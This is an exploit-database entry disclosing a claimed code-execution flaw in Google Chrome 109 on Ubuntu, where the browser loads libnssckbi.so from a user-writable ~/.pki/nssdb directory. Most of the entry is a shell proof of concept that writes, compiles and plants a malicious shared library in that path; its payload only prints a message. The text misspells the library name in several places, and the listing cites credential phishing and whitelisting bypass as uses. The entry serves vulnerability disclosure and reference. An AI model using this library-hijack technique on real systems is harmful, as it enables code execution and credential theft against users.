Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)

vendor:

Google Chrome

by:

Rafay Baloch and Muhammad Samak

N/A

CVSS

N/A

Code Execution

CWE

Product Name: Google Chrome

Affected Version From: 109.0.5414.74

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu

Google Chrome 109.0.5414.74 – Code Execution via missing lib file (Ubuntu)

Google Chrome attempts to load the 'libssckbi.so' file from a user-writable location. It is possible to achieve code execution by placing a malicious file with the name 'libnssckbi.so' in the specified path.

Mitigation:

Ensure that the specified path for loading the 'libssckbi.so' file is not user-writable. Regularly update and patch Google Chrome to prevent exploitation of this vulnerability.

Source

Exploit-DB raw data:

#Exploit Title: Google Chrome  109.0.5414.74 - Code Execution via missing lib file (Ubuntu)
Product: Google Chrome
Discovered by: Rafay Baloch and Muhammad Samak
#Version: 109.0.5414.74
#Impact: Moderate
#Company: Cyber Citadel
#Website: https://www.cybercitadel.com
#Tested-on : Ubuntu 22.04.1

*Description*

Google chrome attempts to load the 'libssckbi.so' file from a user-writable location.
PATH: /home/$username/.pki/nssdb/libnssckbi.so
Since the Shared Library 'ibnssckbi.so' specified path is writeable.
It is possible to achieve the Code Execution by placing the malicious file with 
the name `libnssckbi.so` in the specified path.



*exploit*

Following is the POC that could be used to reproduce the issue:

echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..."
echo "[*] Checking /.pki/nssdb PATH"
if [ -d "/home/haalim/.pki/nssdb" ]
then

	echo "[+] Directory Exists..."
	if [ -w "/home/haalim/.pki/nssdb" ]
	then
    echo "[+] Directory is writable..."

		echo "[+] Directory is writable..."
		echo "[+] Generating malicious File libnssckbi.so ..."
			echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c
			echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c
			echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c
			echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c
			echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c
			echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c
			echo "}" >> /home/haalim/.pki/nssdb/exploit.c
			gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o 
			gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o 


	fi

fi

Upon closing the browser windows, the application executes the malicious code


*Impact*

The attacker can use this behavior to bypass the application whitelisting rules.
This behavior can also lead to DoS attacks.
An attacker can trick a victim into supplying credentials by creating a fake prompt.